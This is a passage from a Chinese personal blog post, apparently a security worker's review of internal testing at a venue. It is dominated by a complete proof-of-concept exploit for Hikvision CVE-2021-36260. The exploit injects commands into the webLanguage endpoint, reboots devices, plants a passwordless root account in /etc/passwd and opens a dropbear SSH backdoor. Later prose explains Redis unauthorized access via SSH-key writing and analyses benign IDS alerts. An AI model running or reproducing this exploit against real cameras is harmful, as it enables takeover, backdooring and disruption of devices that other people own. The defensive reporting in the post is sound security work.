CMD_BLIND</span></span><br><span class="line"><span class="string">                        execute blind cmd (i.e: &quot;reboot&quot;)</span></span><br><span class="line"><span class="string">  --noverify            Do not verify if vulnerable</span></span><br><span class="line"><span class="string">  --proto &#123;http,https&#125;  Protocol used</span></span><br><span class="line"><span class="string">$</span></span><br><span class="line"><span class="string">&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> argparse</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> requests <span class="keyword">import</span> packages</span><br><span class="line"><span class="keyword">from</span> requests.packages <span class="keyword">import</span> urllib3</span><br><span class="line"><span class="keyword">from</span> requests.packages.urllib3 <span class="keyword">import</span> exceptions</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">Http</span>(<span class="title class_ inherited__">object</span>):</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__init__</span>(<span class="params">self, rhost, rport, proto, timeout=<span class="number">60</span></span>):</span><br><span class="line">        <span class="built_in">super</span>(Http, self).__init__()</span><br><span class="line"></span><br><span class="line">        self.rhost = rhost</span><br><span class="line">        self.rport = rport</span><br><span class="line">        self.proto = proto</span><br><span class="line">        self.timeout = timeout</span><br><span class="line"></span><br><span class="line">        self.remote = <span class="literal">None</span></span><br><span class="line">        self.uri = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;&quot;&quot; Most devices will use self-signed certificates, suppress any warnings &quot;&quot;&quot;</span></span><br><span class="line">        requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)</span><br><span class="line"></span><br><span class="line">        self.remote = requests.Session()</span><br><span class="line"></span><br><span class="line">        self._init_uri()</span><br><span class="line"></span><br><span class="line">        self.remote.headers.update(&#123;</span><br><span class="line">            <span class="string">&#x27;Host&#x27;</span>: <span class="string">f&#x27;<span class="subst">&#123;self.rhost&#125;</span>:<span class="subst">&#123;self.rport&#125;</span>&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept&#x27;</span>: <span class="string">&#x27;*/*&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;X-Requested-With&#x27;</span>: <span class="string">&#x27;XMLHttpRequest&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded; charset=UTF-8&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept-Encoding&#x27;</span>: <span class="string">&#x27;gzip, deflate&#x27;</span>,</span><br><span class="line">            <span class="string">&#x27;Accept-Language&#x27;</span>: <span class="string">&#x27;en-US,en;q=0.9,sv;q=0.8&#x27;</span>,</span><br><span class="line">        &#125;)</span><br><span class="line">        <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">        self.remote.proxies.update(&#123;</span></span><br><span class="line"><span class="string">            # &#x27;http&#x27;: &#x27;http://127.0.0.1:8080&#x27;,</span></span><br><span class="line"><span class="string">        &#125;)</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">send</span>(<span class="params">self, url=<span class="literal">None</span>, query_args=<span class="literal">None</span>, timeout=<span class="number">5</span></span>):</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> query_args:</span><br><span class="line">            <span class="string">&quot;&quot;&quot;Some devices can handle more, others less, 22 bytes seems like a good compromise&quot;&quot;&quot;</span></span><br><span class="line">            <span class="keyword">if</span> <span class="built_in">len</span>(query_args) &gt; <span class="number">22</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&#x27;[!] Error: Command &quot;<span class="subst">&#123;query_args&#125;</span>&quot; to long (<span class="subst">&#123;<span class="built_in">len</span>(query_args)&#125;</span>)&#x27;</span>)</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;&quot;&quot;This weird code will try automatically switch between http/https</span></span><br><span class="line"><span class="string">        and update Host</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> url <span class="keyword">and</span> <span class="keyword">not</span> query_args:</span><br><span class="line">                <span class="keyword">return</span> self.get(url, timeout)</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                data = self.put(<span class="string">&#x27;/SDK/webLanguage&#x27;</span>, query_args, timeout)</span><br><span class="line">        <span class="keyword">except</span> requests.exceptions.ConnectionError:</span><br><span class="line">            self.proto = <span class="string">&#x27;https&#x27;</span> <span class="keyword">if</span> self.proto == <span class="string">&#x27;http&#x27;</span> <span class="keyword">else</span> <span class="string">&#x27;https&#x27;</span></span><br><span class="line">            self._init_uri()</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                <span class="keyword">if</span> url <span class="keyword">and</span> <span class="keyword">not</span> query_args:</span><br><span class="line">                    <span class="keyword">return</span> self.get(url, timeout)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    data = self.put(<span class="string">&#x27;/SDK/webLanguage&#x27;</span>, query_args, timeout)</span><br><span class="line">            <span class="keyword">except</span> requests.exceptions.ConnectionError:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="keyword">except</span> requests.exceptions.RequestException:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">        <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">        <span class="string">&quot;&quot;&quot;302 when requesting http on https enabled device&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> data.status_code == <span class="number">302</span>:</span><br><span class="line">            redirect = data.headers.get(<span class="string">&#x27;Location&#x27;</span>)</span><br><span class="line">            self.uri = redirect[:redirect.rfind(<span class="string">&#x27;/&#x27;</span>)]</span><br><span class="line">            self._update_host()</span><br><span class="line">            <span class="keyword">if</span> url <span class="keyword">and</span> <span class="keyword">not</span> query_args:</span><br><span class="line">                <span class="keyword">return</span> self.get(url, timeout)</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                data = self.put(<span class="string">&#x27;/SDK/webLanguage&#x27;</span>, query_args, timeout)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> data</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">_update_host</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> self.remote.headers.get(<span class="string">&#x27;Host&#x27;</span>) == self.uri[self.uri.rfind(<span class="string">&#x27;://&#x27;</span>) + <span class="number">3</span>:]:</span><br><span class="line">            self.remote.headers.update(&#123;</span><br><span class="line">                <span class="string">&#x27;Host&#x27;</span>: self.uri[self.uri.rfind(<span class="string">&#x27;://&#x27;</span>) + <span class="number">3</span>:],</span><br><span class="line">            &#125;)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">_init_uri</span>(<span class="params">self</span>):</span><br><span class="line">        self.uri = <span class="string">&#x27;&#123;proto&#125;://&#123;rhost&#125;:&#123;rport&#125;&#x27;</span>.<span class="built_in">format</span>(proto=self.proto, rhost=self.rhost, rport=<span class="built_in">str</span>(self.rport))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">put</span>(<span class="params">self, url, query_args, timeout</span>):</span><br><span class="line">        <span class="string">&quot;&quot;&quot;Command injection in the &lt;language&gt; tag&quot;&quot;&quot;</span></span><br><span class="line">        query_args = <span class="string">&#x27;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&#x27;</span> \</span><br><span class="line">                     <span class="string">f&#x27;&lt;language&gt;$(<span class="subst">&#123;query_args&#125;</span>)&lt;/language&gt;&#x27;</span></span><br><span class="line">        <span class="keyword">return</span> self.remote.put(self.uri + url, data=query_args, verify=<span class="literal">False</span>, allow_redirects=<span class="literal">False</span>, timeout=timeout)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">get</span>(<span class="params">self, url, timeout</span>):</span><br><span class="line">        <span class="keyword">return</span> self.remote.get(self.uri + url, verify=<span class="literal">False</span>, allow_redirects=<span class="literal">False</span>, timeout=timeout)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check</span>(<span class="params">remote, args</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    status_code == 200 (OK);</span></span><br><span class="line"><span class="string">        Verified vulnerable and exploitable</span></span><br><span class="line"><span class="string">    status_code == 500 (Internal Server Error);</span></span><br><span class="line"><span class="string">        Device may be vulnerable, but most likely not</span></span><br><span class="line"><span class="string">        The SDK webLanguage tag is there, but generate status_code 500 when language not found</span></span><br><span class="line"><span class="string">        I.e. Exist: &lt;language&gt;en&lt;/language&gt; (200), not exist: &lt;language&gt;EN&lt;/language&gt; (500)</span></span><br><span class="line"><span class="string">        (Issue: Could also be other directory than &#x27;webLib&#x27;, r/o FS etc...)</span></span><br><span class="line"><span class="string">    status_code == 401 (Unauthorized);</span></span><br><span class="line"><span class="string">        Defiantly not vulnerable</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> args.noverify:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[*] Not verifying remote &quot;<span class="subst">&#123;args.rhost&#125;</span>:<span class="subst">&#123;args.rport&#125;</span>&quot;&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;[*] Checking remote &quot;<span class="subst">&#123;args.rhost&#125;</span>:<span class="subst">&#123;args.rport&#125;</span>&quot;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    data = remote.send(url=<span class="string">&#x27;/&#x27;</span>, query_args=<span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[-] Cannot establish connection to &quot;<span class="subst">&#123;args.rhost&#125;</span>:<span class="subst">&#123;args.rport&#125;</span>&quot;&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">None</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;[i] ETag:&#x27;</span>, data.headers.get(<span class="string">&#x27;ETag&#x27;</span>))</span><br><span class="line"></span><br><span class="line">    data = remote.send(query_args=<span class="string">&#x27;&gt;webLib/c&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> data.status_code == <span class="number">404</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[-] &quot;<span class="subst">&#123;args.rhost&#125;</span>:<span class="subst">&#123;args.rport&#125;</span>&quot; do not looks like Hikvision&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    status_code = data.status_code</span><br><span class="line"></span><br><span class="line">    data = remote.send(url=<span class="string">&#x27;/c&#x27;</span>, query_args=<span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> data.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;We could not verify command injection&quot;&quot;&quot;</span></span><br><span class="line">        <span class="keyword">if</span> status_code == <span class="number">500</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&#x27;[-] Could not verify if vulnerable (Code: <span class="subst">&#123;status_code&#125;</span>)&#x27;</span>)</span><br><span class="line">            <span class="keyword">if</span> args.reboot:</span><br><span class="line">                <span class="keyword">return</span> check_reboot(remote, args)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">f&#x27;[+] Remote is not vulnerable (Code: <span class="subst">&#123;status_code&#125;</span>)&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;[!] Remote is verified exploitable&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">check_reboot</span>(<span class="params">remote, args</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    We sending &#x27;reboot&#x27;, wait 2 sec, then checking with GET request.</span></span><br><span class="line"><span class="string">    - if there is data returned, we can assume remote is not vulnerable.</span></span><br><span class="line"><span class="string">    - If there is no connection or data returned, we can assume remote is vulnerable.</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> args.check:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;[i] Checking if vulnerable with &quot;reboot&quot;&#x27;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[*] Checking remote &quot;<span class="subst">&#123;args.rhost&#125;</span>:<span class="subst">&#123;args.rport&#125;</span>&quot; with &quot;reboot&quot;&#x27;</span>)</span><br><span class="line">    remote.send(query_args=<span class="string">&#x27;reboot&#x27;</span>)</span><br><span class="line">    time.sleep(<span class="number">2</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> remote.send(url=<span class="string">&#x27;/&#x27;</span>, query_args=<span class="literal">None</span>):</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;[!] Remote is vulnerable&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;[+] Remote is not vulnerable&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">cmd</span>(<span class="params">remote, args</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> check(remote, args):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    data = remote.send(query_args=<span class="string">f&#x27;<span class="subst">&#123;args.cmd&#125;</span>&gt;webLib/x&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line">    data = remote.send(url=<span class="string">&#x27;/x&#x27;</span>, query_args=<span class="literal">None</span>)</span><br><span class="line">    <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="keyword">not</span> data.status_code == <span class="number">200</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[!] Error execute cmd &quot;<span class="subst">&#123;args.cmd&#125;</span>&quot;&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="built_in">print</span>(data.text)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">cmd_blind</span>(<span class="params">remote, args</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">    Blind command injection</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> check(remote, args):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    data = remote.send(query_args=<span class="string">f&#x27;<span class="subst">&#123;args.cmd_blind&#125;</span>&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> data <span class="keyword">is</span> <span class="literal">None</span> <span class="keyword">or</span> <span class="keyword">not</span> data.status_code == <span class="number">500</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[-] Error execute cmd &quot;<span class="subst">&#123;args.cmd_blind&#125;</span>&quot;&#x27;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;[i] Try execute blind cmd &quot;<span class="subst">&#123;args.cmd_blind&#125;</span>&quot;&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">shell</span>(<span class="params">remote, args</span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">not</span> check(remote, args):</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">    data = remote.send(url=<span class="string">&#x27;/N&#x27;</span>, query_args=<span class="literal">None</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> data.status_code == <span class="number">404</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[i] Remote &quot;<span class="subst">&#123;args.rhost&#125;</span>&quot; not pwned, pwning now!&#x27;</span>)</span><br><span class="line">        data = remote.send(query_args=<span class="string">&#x27;echo -n P::0:0:W&gt;N&#x27;</span>)</span><br><span class="line">        <span class="keyword">if</span> data.status_code == <span class="number">401</span>:</span><br><span class="line">            <span class="built_in">print</span>(data.headers)</span><br><span class="line">            <span class="built_in">print</span>(data.text)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line">        remote.send(query_args=<span class="string">&#x27;echo :/:/bin/sh&gt;&gt;N&#x27;</span>)</span><br><span class="line">        remote.send(query_args=<span class="string">&#x27;cat N&gt;&gt;/etc/passwd&#x27;</span>)</span><br><span class="line">        remote.send(query_args=<span class="string">&#x27;dropbear -R -B -p 1337&#x27;</span>)</span><br><span class="line">        remote.send(query_args=<span class="string">&#x27;cat N&gt;webLib/N&#x27;</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">f&#x27;[i] Remote &quot;<span class="subst">&#123;args.rhost&#125;</span>&quot; already pwned&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&#x27;[*] Trying SSH to <span class="subst">&#123;args.rhost&#125;</span> on port 1337&#x27;</span>)</span><br><span class="line">    os.system(<span class="string">f&#x27;stty echo; stty iexten; stty icanon; \</span></span><br><span class="line"><span class="string">    ssh -o StrictHostKeyChecking=no -o LogLevel=error -o UserKnownHostsFile=/dev/null \</span></span><br><span class="line"><span class="string">    P@<span class="subst">&#123;args.rhost&#125;</span> -p 1337&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&#x27;[*] Hikvision CVE-2021-36260\n[*] PoC by bashis &lt;mcw noemail eu&gt; (2021)&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    parser = argparse.ArgumentParser()</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--rhost&#x27;</span>, required=<span class="literal">True</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, default=<span class="literal">None</span>, <span class="built_in">help</span>=<span class="string">&#x27;Remote Target Address (IP/FQDN)&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--rport&#x27;</span>, required=<span class="literal">False</span>, <span class="built_in">type</span>=<span class="built_in">int</span>, default=<span class="number">80</span>, <span class="built_in">help</span>=<span class="string">&#x27;Remote Target Port&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--check&#x27;</span>, required=<span class="literal">False</span>, default=<span class="literal">False</span>, action=<span class="string">&#x27;store_true&#x27;</span>, <span class="built_in">help</span>=<span class="string">&#x27;Check if vulnerable&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--reboot&#x27;</span>, required=<span class="literal">False</span>, default=<span class="literal">False</span>, action=<span class="string">&#x27;store_true&#x27;</span>, <span class="built_in">help</span>=<span class="string">&#x27;Reboot if vulnerable&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--shell&#x27;</span>, required=<span class="literal">False</span>, default=<span class="literal">False</span>, action=<span class="string">&#x27;store_true&#x27;</span>, <span class="built_in">help</span>=<span class="string">&#x27;Launch SSH shell&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--cmd&#x27;</span>, required=<span class="literal">False</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, default=<span class="literal">None</span>, <span class="built_in">help</span>=<span class="string">&#x27;execute cmd (i.e: &quot;ls -l&quot;)&#x27;</span>)</span><br><span class="line">    parser.add_argument(<span class="string">&#x27;--cmd_blind&#x27;</span>, required=<span class="literal">False</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, default=<span class="literal">None</span>, <span class="built_in">help</span>=<span class="string">&#x27;execute blind cmd (i.e: &quot;reboot&quot;)&#x27;</span>)</span><br><span class="line">    parser.add_argument(</span><br><span class="line">        <span class="string">&#x27;--noverify&#x27;</span>, required=<span class="literal">False</span>, default=<span class="literal">False</span>, action=<span class="string">&#x27;store_true&#x27;</span>, <span class="built_in">help</span>=<span class="string">&#x27;Do not verify if vulnerable&#x27;</span></span><br><span class="line">    )</span><br><span class="line">    parser.add_argument(</span><br><span class="line">        <span class="string">&#x27;--proto&#x27;</span>, required=<span class="literal">False</span>, <span class="built_in">type</span>=<span class="built_in">str</span>, choices=[<span class="string">&#x27;http&#x27;</span>, <span class="string">&#x27;https&#x27;</span>], default=<span class="string">&#x27;http&#x27;</span>, <span class="built_in">help</span>=<span class="string">&#x27;Protocol used&#x27;</span></span><br><span class="line">    )</span><br><span class="line">    args = parser.parse_args()</span><br><span class="line"></span><br><span class="line">    remote = Http(args.rhost, args.rport, args.proto)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> args.shell:</span><br><span class="line">            shell(remote, args)</span><br><span class="line">        <span class="keyword">elif</span> args.cmd:</span><br><span class="line">            cmd(remote, args)</span><br><span class="line">        <span class="keyword">elif</span> args.cmd_blind:</span><br><span class="line">            cmd_blind(remote, args)</span><br><span class="line">        <span class="keyword">elif</span> args.check:</span><br><span class="line">            check(remote, args)</span><br><span class="line">        <span class="keyword">elif</span> args.reboot:</span><br><span class="line">            check_reboot(remote, args)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            parser.parse_args([<span class="string">&#x27;-h&#x27;</span>])</span><br><span class="line">    <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">False</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br><span class="line">            </span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>发现大部分摄像头web页面仍然有这个洞，但shell却连不上，没办法只好用Burp抓包手动复现，却发现实际上并没有这个漏洞，在上一次测试后就已经打补丁修复了。虽然有点可惜，但也让我觉得<strong>不能太依赖网上现成的POC</strong>才行，还是要理解漏洞的原理。</p>
<h4 id="Redis未授权访问"><a href="#Redis未授权访问" class="headerlink" title="Redis未授权访问"></a>Redis未授权访问</h4><p>Redis数据库在默认配置下会将6379端口暴露在公网上，并且没有身份验证。</p>
<p>因此导致漏洞的原因很简单：</p>
<blockquote>
<p>Redis 默认情况下，会绑定在 0.0.0.0:6379，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的config 命令，可以进行<strong>写文件操作</strong>，攻击者可以成功将自己的ssh公钥写入目标服务器的 &#x2F;root&#x2F;.ssh 文件夹的authotrized_keys 文件中，进而可以使用对应私钥直接使用ssh服务登录目标服务器。</p>
</blockquote>
<p>总结起来，产生条件有两点：</p>
<ol>
<li>redis监听在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网。</li>
<li>未设置登陆密码</li>
<li>(可选)redis以root权限运行</li>
</ol>
<p>可以做很方便的漏洞利用。</p>
<p>在扫描场馆自建的信息发布网即大屏网，发现了这个漏洞。但经过仔细测试，是写不了shell的。最麻烦的原因是信息发布网服务器是Windows sever，没法利用Linux的操作。</p>
<p>当然漏洞也报上去，很快修复了。</p>
<h4 id="其他杂项"><a href="#其他杂项" class="headerlink" title="其他杂项"></a>其他杂项</h4><p>年终回顾才想起来还有一些值得写一下，当时居然偷懒了。</p>
<h5 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h5><p>有一次EDR报暴力破解，但目标网段明显在内网内，而且不是登录，只是身份验证。</p>
<p>稍微看了下就清楚不是外部攻击，但原因比较让人迷惑。</p>
<p>仔细分析了暴力破解的请求头，似乎是某种流媒体传输协议，想了想应该是某个设备需要连接某个网段实现流媒体传输，但配置出来问题，导致始终无法通过身份验证，而这种协议如果无法连接，会自动重连，导致这种重连请求被EDR检测到告警了。</p>
<p>最后让负责设备的同事把这个请求的网段封了。</p>
<h5 id="ARP扫描"><a href="#ARP扫描" class="headerlink" title="ARP扫描"></a>ARP扫描</h5><p>还有一次在正赛时，告警ARP扫描，一旦某个主机接入G网（场馆内网），就会告警ARP扫描攻击。这个也比较迷惑，虽然能猜到并非外部攻击，但还是很奇怪。</p>
<p>ARP协议在获取不到MAC地址时，会向网段内所有IP发送请求，这个应该就是告警扫描的原因，但为什么获取不到MAC，而且请求的是某个没有使用的IP，让人有点困惑。</p>

        
      </div>

         
    </div>
    
     
  </div>
  
    
<nav id="article-nav">
  <a class="article-nav-btn left "
    
      href="/2023/09/25/Thinking-of-Ever17/"
      title="《Ever17 -the out of infinity-》随想"
     >
    <i class="fa-solid fa-angle-left"></i>
    <p class="title-text">
      
        《Ever17 -the out of infinity-》随想
        
    </p>
  </a>
  <a class="article-nav-btn right "
    
      href="/2023/07/25/BLE-KeyBoard-based-STM32/"
      title="手搓蓝牙机械键盘——基于ESP32、STM32、CH573"
     >

    <p class="title-text">
      
        手搓蓝牙机械键盘——基于ESP32、STM32、CH573
        
    </p>
    <i class="fa-solid fa-angle-right"></i>
  </a>
</nav>


  
</article>


  <script src='//unpkg.com/valine/dist/Valine.min.js'></script>
  <div id="comment-card" class="comment-card">
    <div class="main-title-bar">
      <div class="main-title-dot"></div>
      <div class="main-title">留言 </div>
    </div>
    <div id="vcomments"></div>
  </div>
  <script>
      new Valine({
          el: '#vcomments',
          appId: "j9YBSIHTlRyfuvPQqY50ARfV-gzGzoHsz",
          appKey: "Q7s9zRzne9zaSVrroDR2wgO8"
      })
  </script>
 
    </div>
    <div id="footer-wrapper">
      <footer id="footer">
  
  <div id="footer-info" class="inner">
    
    &copy; 2024 Kizureina<br>
    Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> & Theme <a target="_blank" rel="noopener" href="https://github.com/saicaca/hexo-theme-vivia">Vivia</a>
  </div>
</footer>

    </div>
    <div class="back-to-top-wrapper">
    <button id="back-to-top-btn" class="back-to-top-btn" onclick="topFunction()">
        <span class="material-symbols-rounded">keyboard_arrow_up</span>
    </button>
</div>

<script>
    function topFunction() {
        window.scroll({ top: 0, behavior: 'smooth' });
    }
    let btn = document.getElementById('back-to-top-btn');
    function scrollFunction() {
        if (document.body.scrollTop > 600 || document.documentElement.scrollTop > 600) {
            btn.style.opacity = 1;
        } else {
            btn.style.opacity = 0;
        }
    }
    window.onscroll = function() {
        scrollFunction();
    }
</script>

  </div>
  <script src="/js/light-dark-switch.js"></script>
</body>
</html>
